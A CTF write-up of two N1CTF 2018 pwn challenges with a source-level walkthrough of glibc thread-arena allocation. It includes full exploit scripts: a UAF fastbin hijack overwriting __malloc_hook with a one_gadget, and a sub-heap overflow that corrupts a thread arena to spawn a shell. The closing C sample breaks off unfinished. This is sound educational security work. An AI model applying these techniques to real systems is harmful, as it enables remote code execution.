N1CTF 2018 && A Source-Level Look at Thread Heap Allocation

An international CTF organized by team Nu1L, covering a wide range of topics. This post only records the first and second PWN challenges.

# vote

A fairly standard fastbin exploitation challenge; the core technique is hijacking a fastbin.

## Challenge analysis

The challenge is a voting system built around five functions:

The data structure involved holds each voter's vote count and name:

```
0               8               16              ...
+---------------+---------------+----------------+
|    number     |     time      | name ...       |
+---------------+---------------+----------------+
```

The vote function is implemented rather oddly: it spawns a new thread and passes the thread argument through a variable in the .bss section, then sleep()s for 3 seconds before the vote is counted. This creates a problem: if another vote comes in within those 3 seconds, a race condition makes the first voter's vote land on the second candidate.
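As a minimal sketch of the pattern (all names here are made up for illustration, not symbols from the binary): the index travels through a single unsynchronized global, so a second `do_vote()` issued during the sleep window clobbers it before the worker thread reads it.

```c
#include <pthread.h>
#include <unistd.h>

static int pending_index;          /* shared .bss slot, no lock          */
extern long vote_count[];          /* hypothetical per-candidate counters */

static void *vote_worker(void *arg)
{
    sleep(3);                      /* 3-second window for the race        */
    vote_count[pending_index]++;   /* may see the *second* vote's index   */
    return NULL;
}

static void do_vote(int idx)
{
    pthread_t tid;
    pending_index = idx;           /* clobbers any in-flight vote         */
    pthread_create(&tid, NULL, vote_worker, NULL);
}
```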

Speaking of odd, the cancel function is odder still: it obviously contains a UAF as well as a double-free vulnerability:

## Exploitation

### Address leak

Using the UAF: first allocate a chunk larger than global_max_fast, so that when it is freed it lands in the unsorted bin. In the unsorted bin's list the chunk's fd and bk pointers are filled with the address main_arena + 88, which leaks the libc address. Just make sure the chunk does not get consolidated into the top chunk when freed.
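A sketch of the arithmetic (the __malloc_hook offset below is a placeholder; the script later reads it from the binary via `libc.symbols['__malloc_hook']`): the leaked fd equals &main_arena + 88, and in the 2.23 layout __malloc_hook sits 0x10 bytes before main_arena.

```c
#include <stdint.h>

#define OFF_MALLOC_HOOK 0x3c4b10   /* offset of __malloc_hook in the target
                                      libc-2.23 -- read it from your libc   */

static uintptr_t libc_base_from_leak(uintptr_t leak)
{
    uintptr_t main_arena = leak - 88;         /* fd/bk point at main_arena+88  */
    uintptr_t hook_addr  = main_arena - 0x10; /* &__malloc_hook (2.23 layout)  */
    return hook_addr - OFF_MALLOC_HOOK;
}
```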

### Fastbin hijack

Still using the UAF: a fastbin is a singly linked list, so once you control a chunk's fd pointer you can make malloc return an essentially arbitrary address.

First, allocate two 0x70-sized chunks and free them in order. This builds the singly linked fastbin list, with the second chunk's fd pointing at the first chunk's header.

The somewhat novel point here is that the data structure offers no direct write to the fd pointer. But because of the UAF, voting for an already-freed voter still increments the field that overlaps the freed chunk's fd pointer, so fd can in theory be shifted to point anywhere.

I chose to point fd at the original target + 0x20, because that location is writable (it falls inside the previous voter's name field). By forging a chunk there, the fastbin can then be hijacked anywhere; I hijacked it to __malloc_hook - 0x23. That address is not aligned, but alignment is not checked when the chunk is handed out, and in libc 2.23 several libc pointers live near __malloc_hook: read misaligned, one of their bytes yields a size field of 0x7f, which happens to pass the fastbin size check (and survives the assert on the allocation path as well) -- a remarkably convenient value.
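The check being bypassed is the only fastbin sanity test in 2.23's `_int_malloc`: `chunksize()` masks off the three flag bits, so a size byte of 0x7f reads as 0x78, and `fastbin_index(0x78)` equals `fastbin_index(0x70)`, i.e. the 0x70 bin we are allocating from (abridged from glibc 2.23):

```c
/* glibc 2.23, _int_malloc, fastbin path (abridged) */
if (victim != 0)
  {
    if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
      {
        errstr = "malloc(): memory corruption (fast)";
      errout:
        malloc_printerr (check_action, errstr, chunk2mem (victim), av);
        return NULL;
      }
    ...
  }
```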

Once __malloc_hook is under control, overwrite it with a one_gadget address; the next malloc then drops straight into a shell.

## Exploit script

```python
from pwn import *
import time, base64

debug = 0
elf = ELF('./vote')
if debug:
    p = process('./vote')
    context.log_level = 'debug'
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    #gdb.attach(p)#,'b*0x0400F6D'
else:
    p = remote('47.90.103.10', 6000)
    libc = ELF('./libc-2.23.so')

def add(size, name):
    p.recvuntil('Action:')
    p.sendline('0')
    p.recvuntil('size')
    p.sendline(str(size))
    p.recvuntil('name:')
    p.sendline(name)

def show(index):
    p.recvuntil('Action:')
    p.sendline('1')
    p.recvuntil('index')
    p.sendline(str(index))

def vote(index):
    p.recvuntil('Action:')
    p.sendline('2')
    p.recvuntil('index')
    p.sendline(str(index))

def cancel(index):
    p.recvuntil('Action:')
    p.sendline('4')
    p.recvuntil('index')
    p.sendline(str(index))

# leak: free a large chunk into the unsorted bin, then read its fd via show()
add(0x3e0, 'p4nda')  # 0
add(555, 'p4nda')    # 1, keeps chunk 0 away from the top chunk
cancel(0)
show(0)
p.recvuntil('count: ')
leak = int(p.recvline()[:-1])
libc.address = leak - 88 - 0x10 - libc.symbols['__malloc_hook']
print '[+] leak   :', hex(leak)
print '[+] system :', hex(libc.symbols['system'])

# fastbin hijack: chunk 2's name holds a fake 0x71 chunk whose fd is hook-0x23
add(0x50, p64(0x71) + p64(0x71) + p64(libc.symbols['__malloc_hook'] - 0x23))  # 2
add(0x50, 'p4nda')   # 3
#add(555, 'p4nda')
cancel(2)
cancel(3)
for i in range(32):
    vote(3)          # UAF: each vote bumps chunk 3's fd, +0x20 in total
add(0x50, 'p4nda')   # 4
add(0x50, 'p4nda')   # 5, lands on the fake chunk inside chunk 2's name
add(0x50, 'p4n' + p64(libc.address + 0xf0274))  # 6, name write hits __malloc_hook

# trigger __malloc_hook (one_gadget) with a fresh malloc
p.recvuntil('Action:')
p.sendline('0')
p.recvuntil('size')
p.sendline(str(0x50))
p.interactive()

'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
```

# null

This one involves thread heap allocation. I spent two days in the glibc source, even though the challenge author called it "a relatively easy task". Here is a record of how thread heaps are allocated.

# Thread heap allocation

## Terminology

**Arena** -- as I understand it, an arena is the bookkeeping structure required to allocate memory. There are a main arena and non-main arenas. The main arena grows with sbrk and friends, so its addresses are contiguous; non-main arenas are not contiguous and therefore have to organize multiple sub-heaps. Mapping this to the data structures below: each arena corresponds to one malloc_state, and each sub-heap to one _heap_info. The number of arenas is bounded, and the bound depends on the word size and the number of CPU cores:

```
For 32 bit systems:
     Number of arena = 2 * number of cores + 1.
For 64 bit systems:
     Number of arena = 8 * number of cores + 1.
```
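In the source, this limit comes from NARENAS_FROM_NCORES in malloc/arena.c (the "+ 1" in the rule of thumb accounts for main_arena itself):

```c
#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
```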

**Lock** -- a lock is an ordinary variable manipulated through dedicated lock/unlock functions. It synchronizes threads and prevents race conditions on the shared arena state.

## Data structures

1. _heap_info

   A structure that exists only for thread heaps. It records metadata for the current sub-heap, and a thread arena can own several of them.

   The reason it exists: a process can contain multiple threads, and all threads share one address space, which would make their allocations collide. Since the main thread claims sbrk to keep its heap contiguous, child threads can only obtain heap memory via mmap. Because of how mmap allocates, a thread's heap comes in fixed-size blocks: if a thread needs more heap than one block provides, the next mmap'd heap will not be adjacent to the previous one, so a structure is needed to record which arena each block belongs to plus some memory bookkeeping.

   Sub-heaps are kept as a singly linked list: each _heap_info stores a pointer to the previous sub-heap.

```c
typedef struct _heap_info
{
  mstate ar_ptr;        /* Arena for this heap. */
  struct _heap_info *prev; /* Previous heap. */
  size_t size;          /* Current size in bytes. */
  size_t mprotect_size; /* Size in bytes that has been mprotected
                           PROT_READ|PROT_WRITE.  */
  /* Make sure the following data is properly aligned, particularly
     that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
     MALLOC_ALIGNMENT. */
  char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
```

2. malloc_state

   Anyone who has looked at the process heap will recognize this structure: its best-known instance is main_arena, which lives in libc's data section. Since the main heap is unique, glibc keeps it as a global for convenience. The structure's job is to organize the heap: fastbins, the unsorted bin, the top chunk, the bin lists, and so on.

   Each non-main arena likewise has exactly one malloc_state, called a thread arena (though, as we will see at the end, one arena can be shared by several threads).

```c
struct malloc_state
{
  /* Serialize access.  */
  mutex_t mutex;

  /* Flags (formerly in max_fast).  */
  int flags;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas.  */
  struct malloc_state *next_free;

  /* Memory allocated from the system in this arena.  */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
```

## Structure organization

1. Obtaining an arena

   Start from the malloc code and trace, step by step, how an arena is created and how a thread obtains one. First, __libc_malloc:

```c
void *
__libc_malloc (size_t bytes)
{
  mstate ar_ptr;
  void *victim;

  void *(*hook) (size_t, const void *)
    = atomic_forced_read (__malloc_hook);
  if (__builtin_expect (hook != NULL, 0))
    return (*hook)(bytes, RETURN_ADDRESS (0));

  arena_get (ar_ptr, bytes);

  victim = _int_malloc (ar_ptr, bytes);
  /* Retry with another arena only if we were able to find a usable arena
     before.  */
  if (!victim && ar_ptr != NULL)
    {
      LIBC_PROBE (memory_malloc_retry, 1, bytes);
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
    }

  if (ar_ptr != NULL)
    (void) mutex_unlock (&ar_ptr->mutex);

  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
          ar_ptr == arena_for_chunk (mem2chunk (victim)));
  return victim;
}
libc_hidden_def (__libc_malloc)
```

malloc splits roughly into four parts: first, the check for and dispatch to __malloc_hook; then arena_get, which obtains an arena; then _int_malloc, the main allocation logic (the familiar fastbin/unsorted-bin machinery) whose return value is the candidate chunk; and finally some sanity checks on that chunk.

Following arena_get: it is a macro, and the thread_arena variable is thread-local state recording the arena this thread used most recently.
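Its declaration in malloc/arena.c (glibc 2.23) confirms it is per-thread:

```c
/* the arena most recently attached to this thread, one slot per thread */
static __thread mstate thread_arena attribute_tls_model_ie;
```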

```c
#define arena_get(ptr, size) do { \
      ptr = thread_arena;         \
      arena_lock (ptr, size);     \
  } while (0)
```

Next, arena_lock, also a macro. If the thread already holds an arena (and it is not corrupt), that arena is locked and used; otherwise arena_get2 runs.

```c
#define arena_lock(ptr, size) do {          \
      if (ptr && !arena_is_corrupt (ptr))   \
        (void) mutex_lock (&ptr->mutex);    \
      else                                  \
        ptr = arena_get2 ((size), NULL);    \
  } while (0)
```

Since we are after the arena's initialization, keep following into arena_get2:

arena_get2 first calls get_free_list(), which presumably returns either NULL or a free arena; if it returns one, we are done. When no usable arena is found, the next logic runs: narenas_limit caps the number of arenas, and if it has not been initialized yet it is computed from the core count and mp_.arena_max.

narenas is the current arena count. While it is below the limit, _int_new_arena creates a fresh arena; otherwise reused_arena waits for and reuses an existing one.

```c
static mstate
internal_function
arena_get2 (size_t size, mstate avoid_arena)
{
  mstate a;

  static size_t narenas_limit;

  a = get_free_list ();
  if (a == NULL)
    {
      /* Nothing immediately available, so generate a new arena.  */
      if (narenas_limit == 0)
        {
          if (mp_.arena_max != 0)
            narenas_limit = mp_.arena_max;
          else if (narenas > mp_.arena_test)
            {
              int n = __get_nprocs ();

              if (n >= 1)
                narenas_limit = NARENAS_FROM_NCORES (n);
              else
                /* We have no information about the system.  Assume two
                   cores.  */
                narenas_limit = NARENAS_FROM_NCORES (2);
            }
        }
    repeat:;
      size_t n = narenas;
      /* NB: the following depends on the fact that (size_t)0 - 1 is a
         very large number and that the underflow is OK.  If arena_max
         is set the value of arena_test is irrelevant.  If arena_test
         is set but narenas is not yet larger or equal to arena_test
         narenas_limit is 0.  There is no possibility for narenas to
         be too big for the test to always fail since there is not
         enough address space to create that many arenas.  */
      if (__glibc_unlikely (n <= narenas_limit - 1))
        {
          if (catomic_compare_and_exchange_bool_acq (&narenas, n + 1, n))
            goto repeat;
          a = _int_new_arena (size);
          if (__glibc_unlikely (a == NULL))
            catomic_decrement (&narenas);
        }
      else
        a = reused_arena (avoid_arena);
    }
  return a;
}
```

First into get_free_list: free_list is another global, pointing at the next available arena. The logic is simple: if free_list is non-empty, the arena at its head replaces the one recorded for the current thread and is locked; otherwise NULL is returned.

```c
static mstate
get_free_list (void)
{
  mstate replaced_arena = thread_arena;
  mstate result = free_list;
  if (result != NULL)
    {
      (void) mutex_lock (&free_list_lock);
      result = free_list;
      if (result != NULL)
        {
          free_list = result->next_free;

          /* The arena will be attached to this thread.  */
          ++result->attached_threads;

          detach_arena (replaced_arena);
        }
      (void) mutex_unlock (&free_list_lock);

      if (result != NULL)
        {
          LIBC_PROBE (memory_arena_reuse_free_list, 1, result);
          (void) mutex_lock (&result->mutex);
          thread_arena = result;
        }
    }

  return result;
}
```

Then reused_arena: glibc keeps a static variable next_to_use, initially &main_arena. Each time an arena is successfully handed out, next_to_use advances to the following arena, so arenas are used round-robin and evenly; no single arena is reused disproportionately.

```c
static mstate
reused_arena (mstate avoid_arena)
{
  mstate result;
  /* FIXME: Access to next_to_use suffers from data races.  */
  static mstate next_to_use;
  if (next_to_use == NULL)
    next_to_use = &main_arena;

  /* Iterate over all arenas (including those linked from
     free_list).  */
  result = next_to_use;
  do
    {
      if (!arena_is_corrupt (result) && !mutex_trylock (&result->mutex))
        goto out;

      /* FIXME: This is a data race, see _int_new_arena.  */
      result = result->next;
    }
  while (result != next_to_use);

  /* Avoid AVOID_ARENA as we have already failed to allocate memory
     in that arena and it is currently locked.  */
  if (result == avoid_arena)
    result = result->next;

  /* Make sure that the arena we get is not corrupted.  */
  mstate begin = result;
  while (arena_is_corrupt (result) || result == avoid_arena)
    {
      result = result->next;
      if (result == begin)
        break;
    }

  /* We could not find any arena that was either not corrupted or not the one
     we wanted to avoid.  */
  if (result == begin || result == avoid_arena)
    return NULL;

  /* No arena available without contention.  Wait for the next in line.  */
  LIBC_PROBE (memory_arena_reuse_wait, 3, &result->mutex, result, avoid_arena);
  (void) mutex_lock (&result->mutex);

out:
  /* Attach the arena to the current thread.  Note that we may have
     selected an arena which was on free_list.  */
  {
    /* Update the arena thread attachment counters.  */
    mstate replaced_arena = thread_arena;
    (void) mutex_lock (&free_list_lock);
    detach_arena (replaced_arena);
    ++result->attached_threads;
    (void) mutex_unlock (&free_list_lock);
  }

  LIBC_PROBE (memory_arena_reuse, 2, result, avoid_arena);
  thread_arena = result;
  next_to_use = result->next;

  return result;
}
```

Finally, let us analyze _int_new_arena, which builds a brand-new arena. It first calls new_heap to request memory; the first thing placed in that memory is the heap_info structure, after which the malloc_state structure and the top chunk are set up. At that point a new arena is complete.

```c
static mstate
_int_new_arena (size_t size)
{
  mstate a;
  heap_info *h;
  char *ptr;
  unsigned long misalign;

  h = new_heap (size + (sizeof (*h) + sizeof (*a) + MALLOC_ALIGNMENT),
                mp_.top_pad);
  if (!h)
    {
      /* Maybe size is too large to fit in a single heap.  So, just try
         to create a minimally-sized arena and let _int_malloc() attempt
         to deal with the large request via mmap_chunk().  */
      h = new_heap (sizeof (*h) + sizeof (*a) + MALLOC_ALIGNMENT, mp_.top_pad);
      if (!h)
        return 0;
    }
  a = h->ar_ptr = (mstate) (h + 1);
  malloc_init_state (a);
  a->attached_threads = 1;
  /*a->next = NULL;*/
  a->system_mem = a->max_system_mem = h->size;
  arena_mem += h->size;

  /* Set up the top chunk, with proper alignment. */
  ptr = (char *) (a + 1);
  misalign = (unsigned long) chunk2mem (ptr) & MALLOC_ALIGN_MASK;
  if (misalign > 0)
    ptr += MALLOC_ALIGNMENT - misalign;
  top (a) = (mchunkptr) ptr;
  set_head (top (a), (((char *) h + h->size) - ptr) | PREV_INUSE);

  LIBC_PROBE (memory_arena_new, 2, a, size);
  mstate replaced_arena = thread_arena;
  thread_arena = a;
  mutex_init (&a->mutex);

  (void) mutex_lock (&list_lock);

  /* Add the new arena to the global list.  */
  a->next = main_arena.next;
  /* FIXME: The barrier is an attempt to synchronize with read access
     in reused_arena, which does not acquire list_lock while
     traversing the list.  */
  atomic_write_barrier ();
  main_arena.next = a;

  (void) mutex_unlock (&list_lock);

  (void) mutex_lock (&free_list_lock);
  detach_arena (replaced_arena);
  (void) mutex_unlock (&free_list_lock);

  /* Lock this arena.  NB: Another thread may have been attached to
     this arena because the arena is now accessible from the
     main_arena.next list and could have been picked by reused_arena.
     This can only happen for the last arena created (before the arena
     limit is reached).  At this point, some arena has to be attached
     to two threads.  We could acquire the arena lock before list_lock
     to make it less likely that reused_arena picks this new arena,
     but this could result in a deadlock with ptmalloc_lock_all.  */

  (void) mutex_lock (&a->mutex);

  return a;
}
```

Last, trace new_heap, the function that actually maps the memory. The global aligned_heap_area holds the end address of the previous mmap, already aligned to HEAP_MAX_SIZE. If it is non-NULL, new_heap first tries to map HEAP_MAX_SIZE bytes starting at that address. Since aligned_heap_area is not protected by any lock, several threads may mmap() from the same aligned_heap_area simultaneously; the kernel guarantees only one such mapping at that address succeeds and the others fail. Either way, aligned_heap_area is then reset to NULL. If the mapping succeeds but the returned address is not HEAP_MAX_SIZE-aligned, the region is unmapped and the attempt counts as a failure.

```c
static heap_info *
internal_function
new_heap (size_t size, size_t top_pad)
{
  size_t pagesize = GLRO (dl_pagesize);
  char *p1, *p2;
  unsigned long ul;
  heap_info *h;

  if (size + top_pad < HEAP_MIN_SIZE)
    size = HEAP_MIN_SIZE;
  else if (size + top_pad <= HEAP_MAX_SIZE)
    size += top_pad;
  else if (size > HEAP_MAX_SIZE)
    return 0;
  else
    size = HEAP_MAX_SIZE;
  size = ALIGN_UP (size, pagesize);

  /* A memory region aligned to a multiple of HEAP_MAX_SIZE is needed.
     No swap space needs to be reserved for the following large
     mapping (on Linux, this is the case for all non-writable mappings
     anyway). */
  p2 = MAP_FAILED;
  if (aligned_heap_area)
    {
      p2 = (char *) MMAP (aligned_heap_area, HEAP_MAX_SIZE, PROT_NONE,
                          MAP_NORESERVE);
      aligned_heap_area = NULL;
      if (p2 != MAP_FAILED && ((unsigned long) p2 & (HEAP_MAX_SIZE - 1)))
        {
          __munmap (p2, HEAP_MAX_SIZE);
          p2 = MAP_FAILED;
        }
    }
  if (p2 == MAP_FAILED)
    {
      p1 = (char *) MMAP (0, HEAP_MAX_SIZE << 1, PROT_NONE, MAP_NORESERVE);
      if (p1 != MAP_FAILED)
        {
          p2 = (char *) (((unsigned long) p1 + (HEAP_MAX_SIZE - 1))
                         & ~(HEAP_MAX_SIZE - 1));
          ul = p2 - p1;
          if (ul)
            __munmap (p1, ul);
          else
            aligned_heap_area = p2 + HEAP_MAX_SIZE;
          __munmap (p2 + HEAP_MAX_SIZE, HEAP_MAX_SIZE - ul);
        }
      else
        {
          /* Try to take the chance that an allocation of only HEAP_MAX_SIZE
             is already aligned. */
          p2 = (char *) MMAP (0, HEAP_MAX_SIZE, PROT_NONE, MAP_NORESERVE);
          if (p2 == MAP_FAILED)
            return 0;

          if ((unsigned long) p2 & (HEAP_MAX_SIZE - 1))
            {
              __munmap (p2, HEAP_MAX_SIZE);
              return 0;
            }
        }
    }
  if (__mprotect (p2, size, PROT_READ | PROT_WRITE) != 0)
    {
      __munmap (p2, HEAP_MAX_SIZE);
      return 0;
    }
  h = (heap_info *) p2;
  h->size = size;
  h->mprotect_size = size;
  LIBC_PROBE (memory_heap_new, 2, h, h->size);
  return h;
}
```
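This HEAP_MAX_SIZE alignment is what makes chunk-to-arena lookup cheap: for any chunk in a non-main arena, masking its address yields the enclosing heap_info, whose ar_ptr then gives the owning arena (malloc/arena.c, glibc 2.23):

```c
/* find the heap and corresponding arena for a given ptr */
#define heap_for_ptr(ptr) \
  ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
  (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)
```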
2. Growing an arena

   When malloc serves a large request and the top chunk runs out, the top chunk must be enlarged. For a non-main arena, extending top only sometimes yields contiguous memory, and this is exactly what sub-heaps are for. Looking at the tail end of _int_malloc: when the top chunk cannot satisfy the request, any fastbins are consolidated first; if that still is not enough, sysmalloc is called for more memory.

```c
      ...
      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
        {
          remainder_size = size - nb;
          remainder = chunk_at_offset (victim, nb);
          av->top = remainder;
          set_head (victim, nb | PREV_INUSE |
                    (av != &main_arena ? NON_MAIN_ARENA : 0));
          set_head (remainder, remainder_size | PREV_INUSE);

          check_malloced_chunk (av, victim, nb);
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }

      /* When we are using atomic ops to free fast chunks we can get
         here for all block sizes.  */
      else if (have_fastchunks (av))
        {
          malloc_consolidate (av);
          /* restore original bin index */
          if (in_smallbin_range (nb))
            idx = smallbin_index (nb);
          else
            idx = largebin_index (nb);
        }

      /*
         Otherwise, relay to handle system-dependent cases
       */
      else
        {
          void *p = sysmalloc (nb, av);
          if (p != NULL)
            alloc_perturb (p, bytes);
          return p;
        }
      ...
```

Tracing sysmalloc (the code is long, so only the non-main-arena path is excerpted): when the request is below the direct-mmap threshold and the arena is a non-main arena, glibc first tries to extend the existing heap in place (contiguous allocation). If the length still cannot satisfy the request, it allocates a fresh sub-heap and fills in its heap_info -- that is, it mmaps a new block of memory, which typically lands at a lower address than the block mapped just before it.


```c
static void *
sysmalloc (INTERNAL_SIZE_T nb, mstate av)
{
  mchunkptr old_top;              /* incoming value of av->top */
  INTERNAL_SIZE_T old_size;       /* its size */
  char *old_end;                  /* its end address */

  long size;                      /* arg to first MORECORE or mmap call */
  char *brk;                      /* return value from MORECORE */

  long correction;                /* arg to 2nd MORECORE call */
  char *snd_brk;                  /* 2nd return val */

  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
  char *aligned_brk;              /* aligned offset into brk */

  mchunkptr p;                    /* the allocated/returned chunk */
  mchunkptr remainder;            /* remainder from allocation */
  unsigned long remainder_size;   /* its size */

  size_t pagesize = GLRO (dl_pagesize);
  bool tried_mmap = false;

  /*
     If have mmap, and the request size meets the mmap threshold, and
     the system supports mmap, and there are few enough currently
     allocated mmapped regions, try to directly map this request
     rather than expanding top.
   */

  if (av == NULL
      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
          && (mp_.n_mmaps < mp_.n_mmaps_max)))
    {
      ...
    }

  if (av != &main_arena)
    {
      heap_info *old_heap, *heap;
      size_t old_heap_size;

      /* First try to extend the current heap. */
      old_heap = heap_for_ptr (old_top);
      old_heap_size = old_heap->size;
      if ((long) (MINSIZE + nb - old_size) > 0
          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
        {
          av->system_mem += old_heap->size - old_heap_size;
          arena_mem += old_heap->size - old_heap_size;
          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
                    | PREV_INUSE);
        }
      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
        {
          /* Use a newly allocated heap.  */
          heap->ar_ptr = av;
          heap->prev = old_heap;
          av->system_mem += heap->size;
          arena_mem += heap->size;
          /* Set up the new top.  */
          top (av) = chunk_at_offset (heap, sizeof (*heap));
          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);

          /* Setup fencepost and free the old top chunk with a multiple of
             MALLOC_ALIGNMENT in size. */
          /* The fencepost takes at least MINSIZE bytes, because it might
             become the top chunk again later.  Note that a footer is set
             up, too, although the chunk is marked in use. */
          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
          if (old_size >= MINSIZE)
            {
              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
              _int_free (av, old_top, 1);
            }
          else
            {
              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
              set_foot (old_top, (old_size + 2 * SIZE_SZ));
            }
        }
      else if (!tried_mmap)
        /* We can at least try to use to mmap memory.  */
        goto try_mmap;
    }
  else     /* av == main_arena */
    {
      ...
    }
}
```
That covers thread-heap initialization, extension, and sub-heap creation.



## Challenge analysis

The program logic is simple: main does nothing except start a single thread.

![](/img/n1ctf2018/2-1.png)

Inside the thread, the user can fill memory with any number of chunks of any size, and can write data into the last chunk allocated.

![](/img/n1ctf2018/2-3.png)

![](/img/n1ctf2018/2-2.png)

## Exploitation

The vulnerability is in the write function: a heap overflow that can write past the chunk by as many bytes again as the chunk's own size.

![](/img/n1ctf2018/2-4.png)

The program offers no address leak, but the address of system is already given.

The exploitation relies on the thread-heap allocation internals described above.

1. First fill up the sub-heap that the thread's non-main arena allocated initially.

2. On the next request, the thread has no choice but to map a new sub-heap; this sub-heap lands at a lower address than the first one.

3. Fill that sub-heap as well, writing data in the final fill. Because of the heap overflow, the write runs off the end of the second sub-heap into the start of the first one, corrupting the non-main arena's malloc_state (the thread arena) -- see the layout sketch after this list. From here on, exploitation is identical to having corrupted main_arena.

4. Mount a fastbin attack: hijack a fastbin onto the .bss, where a function pointer is called right after the write. Set that pointer to system and place '/bin/sh' at the start of the chunk to get a shell.
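Roughly, the layout after step 2 (a hedged sketch; on Linux successive mmap()s typically stack downward, so the second sub-heap ends exactly where the first one begins -- addresses are illustrative):

```
low addresses
+---------------------+ <- sub-heap 2 (mapped second, HEAP_MAX_SIZE aligned)
| heap_info #2        |
| chunk | chunk | ... |
| last chunk ~~~~~~~~~~~~ overflow runs past the end of the mapping ...
+---------------------+ <- sub-heap 1 (mapped first)
| heap_info #1        |  ... into here
| malloc_state        | <- thread arena: fastbinsY[], top, ... corruptible
| chunk | ... | top   |
+---------------------+
high addresses
```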

**Hints:**

1. Be sure to hijack the 0x70 fastbin chain: the STDIO FILE pointer at the very start of the .bss supplies the misaligned 0x7f size byte, the same trick as in the first challenge.

2. Hijacking the top pointer for an arbitrary allocation does not work here, because the size check at the end of _int_malloc (size >= nb + MINSIZE, quoted above) cannot be passed; interested readers are welcome to step into that pit themselves.



## Exploit script

```python
from pwn import *
import time

debug = 1
elf = ELF('./null')
if debug:
    p = process('./null')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    context.log_level = 'debug'
else:
    exit(0)

p.recvuntil('Enter secret password:')
p.send('i\'m ready for challenge\n')
time.sleep(3)

# spray large blocks to exhaust the thread arena's current sub-heaps
for i in range(0, 3):
    p.recvuntil('Action:')
    p.sendline('1')
    p.recvuntil('Size:')
    p.sendline(str(0x4000))
    p.recvuntil('blocks:')
    p.sendline(str(1000 - 1))
    p.recvuntil('(0/1):')
    p.sendline('0')

p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1000 - 1))
p.recvuntil('(0/1):')
p.sendline('0')

p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1000))
p.recvuntil('(0/1):')
p.sendline('0')

p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1000 - 1))
p.recvuntil('(0/1):')
p.sendline('0')

p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(90 - 1))
p.recvuntil('(0/1):')
p.sendline('0')

# final fill with edit=1: the write overflows out of the second sub-heap
# into the first sub-heap's heap_info + malloc_state
p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1))
p.recvuntil('(0/1):')
p.sendline('1')
p.recvuntil('Input:')

p.send('/bin/sh\0' + p64(0) * (2 + 4 + 2 + 8 + 3 - 1))
# 0x60201d: misaligned bss address whose size byte reads 0x7f (0x70 fastbin)
padding = p64(0) * (0x4000 / 8 - 2 - 4 - 8 - 3) + p64(0) + p64(0x11) + p64(0) * 4 + p64(0) + p64(0) * 5 + p64(0x60201d) + p64(0) * 4  # p64(0x602028-4)
print hex(len(padding))
p.send(padding)
#gdb.attach(p,'info threads')

# allocate from the corrupted 0x70 fastbin: the chunk lands on the bss and
# the edit rewrites the function pointer (0x400978) called after the write
p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x60))
p.recvuntil('blocks:')
p.sendline(str(0))
p.recvuntil('(0/1):')
p.sendline('1')
p.recvuntil('Input:')
p.send('sh\0' + p64(0) + p64(0x400978) + p64(0) * (0x60 / 8))

p.interactive()
```

# Other notes

1. After this competition, the gap between me and the top players feels enormous; more reading is clearly in order.

2. This suggests a new challenge idea: since arenas are reused, once a program has enough threads, the main thread and some worker thread end up sharing the same arena, so a heap overflow in another thread can corrupt the main thread's heap as well. For example, the following experiment:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>

static int num;

void *thread_func(void *arg)
{
    char *a = malloc(0x80);
    printf("[%d] malloc address %p\n", num++, a);
    sleep(10);
    return NULL;
}

int main()
{
